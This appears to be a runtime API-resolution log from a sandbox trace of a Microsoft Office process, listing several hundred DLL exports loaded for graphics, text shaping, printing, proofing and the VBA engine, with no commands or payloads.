DynamicLoader: OLEAUT32.dll/GetRecordInfoFromGuids
DynamicLoader: OLEAUT32.dll/SafeArrayGetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArraySetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArrayGetIID
DynamicLoader: OLEAUT32.dll/SafeArraySetIID
DynamicLoader: OLEAUT32.dll/SafeArrayCopyData
DynamicLoader: OLEAUT32.dll/SafeArrayAllocDescriptorEx
DynamicLoader: OLEAUT32.dll/SafeArrayCreateEx
DynamicLoader: OLEAUT32.dll/VarFormat
DynamicLoader: OLEAUT32.dll/VarFormatDateTime
DynamicLoader: OLEAUT32.dll/VarFormatNumber
DynamicLoader: OLEAUT32.dll/VarFormatPercent
DynamicLoader: OLEAUT32.dll/VarFormatCurrency
DynamicLoader: OLEAUT32.dll/VarWeekdayName
DynamicLoader: OLEAUT32.dll/VarMonthName
DynamicLoader: OLEAUT32.dll/VarAdd
DynamicLoader: OLEAUT32.dll/VarAnd
DynamicLoader: OLEAUT32.dll/VarCat
DynamicLoader: OLEAUT32.dll/VarDiv
DynamicLoader: OLEAUT32.dll/VarEqv
DynamicLoader: OLEAUT32.dll/VarIdiv
DynamicLoader: OLEAUT32.dll/VarImp
DynamicLoader: OLEAUT32.dll/VarMod
DynamicLoader: OLEAUT32.dll/VarMul
DynamicLoader: OLEAUT32.dll/VarOr
DynamicLoader: OLEAUT32.dll/VarPow
DynamicLoader: OLEAUT32.dll/VarSub
DynamicLoader: OLEAUT32.dll/VarXor
DynamicLoader: OLEAUT32.dll/VarAbs
DynamicLoader: OLEAUT32.dll/VarFix
DynamicLoader: OLEAUT32.dll/VarInt
DynamicLoader: OLEAUT32.dll/VarNeg
DynamicLoader: OLEAUT32.dll/VarNot
DynamicLoader: OLEAUT32.dll/VarRound
DynamicLoader: OLEAUT32.dll/VarCmp
DynamicLoader: OLEAUT32.dll/VarDecAdd
DynamicLoader: OLEAUT32.dll/VarDecCmp
DynamicLoader: OLEAUT32.dll/VarBstrCat
DynamicLoader: OLEAUT32.dll/VarCyMulI4
DynamicLoader: OLEAUT32.dll/VarBstrCmp
DynamicLoader: ole32.dll/CoCreateInstanceEx
DynamicLoader: ole32.dll/CLSIDFromProgIDEx
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/_MsoMultiByteToWideChar@24
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: SXS.DLL/SxsOleAut32MapConfiguredClsidToReferenceClsid
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/RegisterTypeLibForUser
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ole32.dll/OleInitialize
DynamicLoader: ole32.dll/OleUninitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: VBE7.DLL/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/LocaleNameToLCID
DynamicLoader: kernel32.dll/GetLocaleInfoEx
DynamicLoader: kernel32.dll/LCIDToLocaleName
DynamicLoader: kernel32.dll/GetSystemDefaultLocaleName
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: Comctl32.dll/RegisterClassNameW
DynamicLoader: UxTheme.DLL/OpenThemeData
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GDI32.dll/GdiTransparentBlt
DynamicLoader: GDI32.dll/GdiAlphaBlend
DynamicLoader: GDI32.dll/GdiGradientFill
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: GdiPlus.dll/GdiplusStartup
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: USER32.dll/GetWindowInfo
DynamicLoader: USER32.dll/GetAncestor
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/EnumDisplayDevicesA
DynamicLoader: GDI32.dll/ExtTextOutW
DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
DynamicLoader: GdiPlus.dll/GdipDeletePath
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipCreatePath
DynamicLoader: GdiPlus.dll/GdipStartPathFigure
DynamicLoader: GdiPlus.dll/GdipAddPathLine2
DynamicLoader: GdiPlus.dll/GdipClosePathFigure
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipClonePath
DynamicLoader: GdiPlus.dll/GdipCreateMatrix2
DynamicLoader: GdiPlus.dll/GdipTransformPath
DynamicLoader: GdiPlus.dll/GdipDeleteMatrix
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipAddPathPolygon
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetPathWorldBounds
DynamicLoader: GdiPlus.dll/GdipCreatePen1
DynamicLoader: GdiPlus.dll/GdipSetPenLineCap197819
DynamicLoader: GdiPlus.dll/GdipSetPenLineJoin
DynamicLoader: GdiPlus.dll/GdipSetPenMiterLimit
DynamicLoader: GdiPlus.dll/GdipCreatePathIter
DynamicLoader: GdiPlus.dll/GdipPathIterRewind
DynamicLoader: GdiPlus.dll/GdipPathIterNextSubpath
DynamicLoader: GdiPlus.dll/GdipPathIterCopyData
DynamicLoader: GdiPlus.dll/GdipDeletePathIter
DynamicLoader: GdiPlus.dll/GdipAddPathLine
DynamicLoader: GdiPlus.dll/GdipClonePen
DynamicLoader: GdiPlus.dll/GdipSetPenStartCap
DynamicLoader: GdiPlus.dll/GdipSetPenEndCap
DynamicLoader: GdiPlus.dll/GdipDeletePen
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipCreateFromHDC
DynamicLoader: GdiPlus.dll/GdipSetPixelOffsetMode
DynamicLoader: GdiPlus.dll/GdipSetSmoothingMode
DynamicLoader: GdiPlus.dll/GdipSetCompositingQuality
DynamicLoader: GdiPlus.dll/GdipSetPageUnit
DynamicLoader: GdiPlus.dll/GdipSetInterpolationMode
DynamicLoader: GdiPlus.dll/GdipGetSmoothingMode
DynamicLoader: GdiPlus.dll/GdipTransformPoints
DynamicLoader: GdiPlus.dll/GdipCreateMetafileFromWmfFile
DynamicLoader: GdiPlus.dll/GdipCreateImageAttributes
DynamicLoader: GdiPlus.dll/GdipSetImageAttributesWrapMode
DynamicLoader: GdiPlus.dll/GdipGetImageType
DynamicLoader: GdiPlus.dll/GdipGetMetafileHeaderFromMetafile
DynamicLoader: GdiPlus.dll/GdipConvertToEmfPlus
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegQueryInfoKeyA
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: kernel32.dll/RegCreateKeyExW
DynamicLoader: kernel32.dll/RegQueryValueExW
DynamicLoader: GdiPlus.dll/GdipGetImageBounds
DynamicLoader: GdiPlus.dll/GdipGetInterpolationMode
DynamicLoader: GdiPlus.dll/GdipDrawImagePointsRect
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipDisposeImageAttributes
DynamicLoader: GdiPlus.dll/GdipDisposeImage
DynamicLoader: GdiPlus.dll/GdipDeleteGraphics
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: USP10.DLL/ScriptItemizeOpenType
DynamicLoader: USP10.DLL/ScriptShapeOpenType
DynamicLoader: USP10.DLL/ScriptPlaceOpenType
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipAddPathRectangle
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipCreateSolidFill
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipSetSolidFillColor
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetPointCount
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetVisibleClipBoundsI
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipCreateMatrix
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipSetMatrixElements
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipSetTextRenderingHint
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipSetWorldTransform
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetWorldTransform
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipResetWorldTransform
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipCreateRegion
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetClip
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipSetClipRegion
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipDeleteRegion
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipSetClipRectI
DynamicLoader: mso.dll/
DynamicLoader: USP10.DLL/ScriptItemize
DynamicLoader: USP10.DLL/ScriptPlace
DynamicLoader: USP10.DLL/ScriptShape
DynamicLoader: USP10.DLL/ScriptItemizeOpenType
DynamicLoader: USP10.DLL/ScriptPlaceOpenType
DynamicLoader: USP10.DLL/ScriptShapeOpenType
DynamicLoader: USP10.DLL/ScriptJustify
DynamicLoader: USP10.DLL/ScriptTextOut
DynamicLoader: USP10.DLL/ScriptCPtoX
DynamicLoader: USP10.DLL/ScriptXtoCP
DynamicLoader: USP10.DLL/ScriptFreeCache
DynamicLoader: USP10.DLL/ScriptCacheGetHeight
DynamicLoader: USP10.DLL/ScriptGetCMap
DynamicLoader: USP10.DLL/ScriptLayout
DynamicLoader: USP10.DLL/ScriptBreak
DynamicLoader: USP10.DLL/ScriptIsComplex
DynamicLoader: USP10.DLL/ScriptGetFontFeatureTags
DynamicLoader: USP10.DLL/ScriptGetFontScriptTags
DynamicLoader: USP10.DLL/ScriptGetFontLanguageTags
DynamicLoader: USP10.DLL/ScriptGetLogicalWidths
DynamicLoader: USP10.DLL/ScriptApplyLogicalWidth
DynamicLoader: USP10.DLL/ScriptGetGlyphABCWidth
DynamicLoader: USP10.DLL/ScriptCacheGetHeight
DynamicLoader: USP10.DLL/ScriptGetGlyphABCWidth
DynamicLoader: USP10.DLL/ScriptGetFontProperties
DynamicLoader: USP10.DLL/ScriptApplyDigitSubstitution
DynamicLoader: USP10.DLL/ScriptRecordDigitSubstitution
DynamicLoader: USP10.DLL/ScriptGetProperties
DynamicLoader: USP10.DLL/ScriptGetFontAlternateGlyphs
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetRegionHRgn
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetDC
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetMatrixElements
DynamicLoader: mso.dll/
DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipReleaseDC
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipDeleteBrush
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/NotifyServiceStatusChangeW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipLoadImageFromStreamICM
DynamicLoader: WindowsCodecs.dll/DllGetClassObject
DynamicLoader: kernel32.dll/WerRegisterMemoryBlock
DynamicLoader: GdiPlus.dll/GdipGetImageRawFormat
DynamicLoader: GdiPlus.dll/GdipGetImageFlags
DynamicLoader: GdiPlus.dll/GdipGetImageWidth
DynamicLoader: GdiPlus.dll/GdipGetImageHeight
DynamicLoader: GdiPlus.dll/GdipGetImagePixelFormat
DynamicLoader: GdiPlus.dll/GdipGetImageHorizontalResolution
DynamicLoader: GdiPlus.dll/GdipGetImageVerticalResolution
DynamicLoader: GdiPlus.dll/GdipImageGetFrameCount
DynamicLoader: GdiPlus.dll/GdipCreateBitmapFromGraphics
DynamicLoader: GdiPlus.dll/GdipGetImageGraphicsContext
DynamicLoader: GdiPlus.dll/GdipTranslateWorldTransform
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: GdiPlus.dll/GdipCreateCachedBitmap
DynamicLoader: GdiPlus.dll/GdipDrawCachedBitmap
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/NotifyServiceStatusChangeW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: msproof7.dll/DllGetClassObject
DynamicLoader: msproof7.dll/DllCanUnloadNow
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: riched20.dll/REMSOHInst
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: CRYPTSP.dll/CryptGenKey
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: MSGR3EN.DLL/CheckVersion
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/SetDefaultPrinterW
DynamicLoader: WINSPOOL.DRV/GetDefaultPrinterW
DynamicLoader: WINSPOOL.DRV/GetPrinterDriverPackagePathW
DynamicLoader: WINSPOOL.DRV/CorePrinterDriverInstalledW
DynamicLoader: WINSPOOL.DRV/GetCorePrinterDriversW
DynamicLoader: WINSPOOL.DRV/UploadPrinterDriverPackageW
DynamicLoader: WINSPOOL.DRV/InstallPrinterDriverFromPackageW
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/AddPrinterConnection2W
DynamicLoader: WINSPOOL.DRV/OpenPrinter2W
DynamicLoader: WINSPOOL.DRV/DeletePrinterKeyW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDataExW
DynamicLoader: WINSPOOL.DRV/EnumPrinterKeyW
DynamicLoader: WINSPOOL.DRV/EnumPrinterDataExW
DynamicLoader: WINSPOOL.DRV/GetPrinterDataExW
DynamicLoader: WINSPOOL.DRV/SetPrinterDataExW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDataW
DynamicLoader: WINSPOOL.DRV/EnumPrinterDataW
DynamicLoader: WINSPOOL.DRV/SpoolerPrinterEvent
DynamicLoader: WINSPOOL.DRV/SetPortW
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: WINSPOOL.DRV/DevicePropertySheets
DynamicLoader: WINSPOOL.DRV/IsValidDevmodeW
DynamicLoader: WINSPOOL.DRV/IsValidDevmodeA
DynamicLoader: WINSPOOL.DRV/AddPortExW
DynamicLoader: WINSPOOL.DRV/DeletePrintProvidorW
DynamicLoader: WINSPOOL.DRV/AddPrintProvidorW
DynamicLoader: WINSPOOL.DRV/DeletePrintProcessorW
DynamicLoader: WINSPOOL.DRV/DeleteMonitorW
DynamicLoader: WINSPOOL.DRV/AddMonitorW
DynamicLoader: WINSPOOL.DRV/StartDocDlgW
DynamicLoader: WINSPOOL.DRV/AdvancedDocumentPropertiesW
DynamicLoader: WINSPOOL.DRV/AdvancedDocumentPropertiesA
DynamicLoader: WINSPOOL.DRV/DocumentPropertiesW
DynamicLoader: WINSPOOL.DRV/DeviceCapabilitiesW
DynamicLoader: WINSPOOL.DRV/DeletePrinterIC
DynamicLoader: WINSPOOL.DRV/PlayGdiScriptOnPrinterIC
DynamicLoader: WINSPOOL.DRV/CreatePrinterIC
DynamicLoader: WINSPOOL.DRV/SetJobW
DynamicLoader: WINSPOOL.DRV/GetJobW
DynamicLoader: WINSPOOL.DRV/EnumJobsW
DynamicLoader: WINSPOOL.DRV/AddPrinterW
DynamicLoader: WINSPOOL.DRV/SetPrinterW
DynamicLoader: WINSPOOL.DRV/GetPrinterDriverW
DynamicLoader: WINSPOOL.DRV/GetPrinterDriverDirectoryW
DynamicLoader: WINSPOOL.DRV/EnumPrintersW
DynamicLoader: WINSPOOL.DRV/AddPrinterConnectionW
DynamicLoader: WINSPOOL.DRV/DeletePrinterConnectionW
DynamicLoader: WINSPOOL.DRV/AddPrinterDriverExW
DynamicLoader: WINSPOOL.DRV/AddPrinterDriverExA
DynamicLoader: WINSPOOL.DRV/EnumPrinterDriversW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDriverW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDriverExW
DynamicLoader: WINSPOOL.DRV/AddPrintProcessorW
DynamicLoader: WINSPOOL.DRV/EnumPrintProcessorsW
DynamicLoader: WINSPOOL.DRV/GetPrintProcessorDirectoryW
DynamicLoader: WINSPOOL.DRV/EnumPrintProcessorDatatypesW
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/SplDriverUnloadComplete
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/OpenPrinterW
DynamicLoader: WINSPOOL.DRV/OpenPrinterA
DynamicLoader: WINSPOOL.DRV/ResetPrinterW
DynamicLoader: WINSPOOL.DRV/StartDocPrinterW
DynamicLoader: WINSPOOL.DRV/FlushPrinter
DynamicLoader: WINSPOOL.DRV/GetPrinterDataW
DynamicLoader: WINSPOOL.DRV/SetPrinterDataW
DynamicLoader: WINSPOOL.DRV/AddJobW
DynamicLoader: WINSPOOL.DRV/ScheduleJob
DynamicLoader: WINSPOOL.DRV/WaitForPrinterChange
DynamicLoader: WINSPOOL.DRV/FindNextPrinterChangeNotification
DynamicLoader: WINSPOOL.DRV/PrinterMessageBoxW
DynamicLoader: WINSPOOL.DRV/ClosePrinter
DynamicLoader: WINSPOOL.DRV/AddFormW
DynamicLoader: WINSPOOL.DRV/DeleteFormW
DynamicLoader: WINSPOOL.DRV/GetFormW
DynamicLoader: WINSPOOL.DRV/SetFormW
DynamicLoader: WINSPOOL.DRV/EnumFormsW
DynamicLoader: WINSPOOL.DRV/EnumPortsW
DynamicLoader: WINSPOOL.DRV/EnumMonitorsW
DynamicLoader: WINSPOOL.DRV/AddPortW
DynamicLoader: WINSPOOL.DRV/ConfigurePortW
DynamicLoader: WINSPOOL.DRV/DeletePortW
DynamicLoader: WINSPOOL.DRV/GetPrinterW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDriverPackageW
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: GDI32.dll/GdiPrinterThunk
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: secur32.dll/InitSecurityInterfaceW
DynamicLoader: cryptsp.dll/SystemFunction035
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: unidrvui.dll/DrvResetConfigCache
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
